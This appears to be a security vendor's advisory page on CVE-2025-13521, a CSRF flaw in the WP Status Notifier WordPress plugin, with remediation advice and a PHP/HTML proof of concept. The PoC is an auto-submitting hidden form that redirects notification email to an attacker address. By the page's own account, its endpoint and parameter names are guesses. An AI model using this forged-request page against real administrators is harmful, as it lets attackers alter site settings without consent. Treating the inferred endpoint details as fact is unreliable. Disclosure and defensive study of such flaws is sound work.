Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13521: WP Status Notifier <= 1.0 – Cross-Site Request Forgery to Settings Update (wp-change-status-notifier)

Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.0
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13521 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the WP Status Notifier WordPress plugin version 1.0. The vulnerability resides in the plugin’s settings update functionality. It allows unauthenticated attackers to modify plugin configuration by tricking an administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and limited impact scope.

Atomic Edge research indicates the root cause is missing or incorrect nonce validation. WordPress nonces provide CSRF protection by requiring a unique token for state-changing actions. The plugin’s settings update handler likely uses the `admin_post` or `admin-ajax.php` endpoint without verifying the `_wpnonce` parameter. This conclusion is inferred from the CWE-352 classification and the description’s explicit mention of “missing or incorrect nonce validation.” Without access to source code, Atomic Edge cannot confirm the exact function names or hook implementations.

Exploitation requires an attacker to craft a malicious HTML page containing a forged request. When a logged-in administrator visits this page, their browser automatically submits a POST request to the WordPress admin endpoint. Based on WordPress plugin patterns, the likely target is `/wp-admin/admin-post.php?action=wp_change_status_notifier_update_settings` or `/wp-admin/admin-ajax.php?action=wp_change_status_notifier_update`. The payload would include plugin-specific parameters like `notification_recipient`, `notification_subject`, or `notification_message`. The attacker could redirect notifications to their own email address or disable security features.

Remediation requires adding proper nonce verification. The plugin should implement `wp_verify_nonce()` checks before processing any settings update. WordPress provides the `check_admin_referer()` function for admin-post handlers and `check_ajax_referer()` for AJAX endpoints. The fix must also include capability checks using `current_user_can(‘manage_options’)` to ensure only administrators can modify settings. These measures follow WordPress coding standards for secure plugin development.

Successful exploitation allows attackers to modify plugin configuration. While the CVSS vector indicates no confidentiality or availability impact (C:N/A:N), the integrity impact (I:L) enables attackers to change notification settings. This could redirect status change alerts to attacker-controlled email addresses, suppress security notifications, or modify message templates. Attackers cannot directly escalate privileges or execute code through this vulnerability alone, but they could facilitate social engineering or hide other malicious activities.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13521 - WP Status Notifier <= 1.0 - Cross-Site Request Forgery to Settings Update
<?php
/**
 * Proof of Concept for CVE-2025-13521
 * This script generates an HTML page that exploits the CSRF vulnerability.
 * When a logged-in WordPress administrator visits this page, their browser
 * automatically submits a forged POST request to update plugin settings.
 *
 * ASSUMPTIONS (based on WordPress plugin patterns):
 * 1. The plugin uses admin-post.php endpoint for settings updates
 * 2. The action parameter is derived from plugin slug: 'wp_change_status_notifier_update'
 * 3. Settings include at least 'notification_email' parameter
 * 4. No nonce validation exists in the vulnerable version
 */

$target_url = "https://vulnerable-site.com/wp-admin/admin-post.php";
$action = "wp_change_status_notifier_update";
$attacker_email = "attacker@example.com";

?>
<!DOCTYPE html>
<html>
<head>
    <title>Legitimate Looking Page</title>
</head>
<body>
    <h1>Please wait while we redirect you...</h1>
    
    <!-- Hidden form that auto-submits via JavaScript -->
    <form id="exploit_form" action="<?php echo htmlspecialchars($target_url); ?>" method="POST">
        <input type="hidden" name="action" value="<?php echo htmlspecialchars($action); ?>">
        <!-- Common plugin settings parameters (inferred from plugin name) -->
        <input type="hidden" name="notification_email" value="<?php echo htmlspecialchars($attacker_email); ?>">
        <input type="hidden" name="enable_notifications" value="1">
        <input type="hidden" name="notification_subject" value="Status Change">
    </form>
    
    <script>
        // Auto-submit the form after page load
        document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('exploit_form').submit();
        });
    </script>
</body>
</html>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School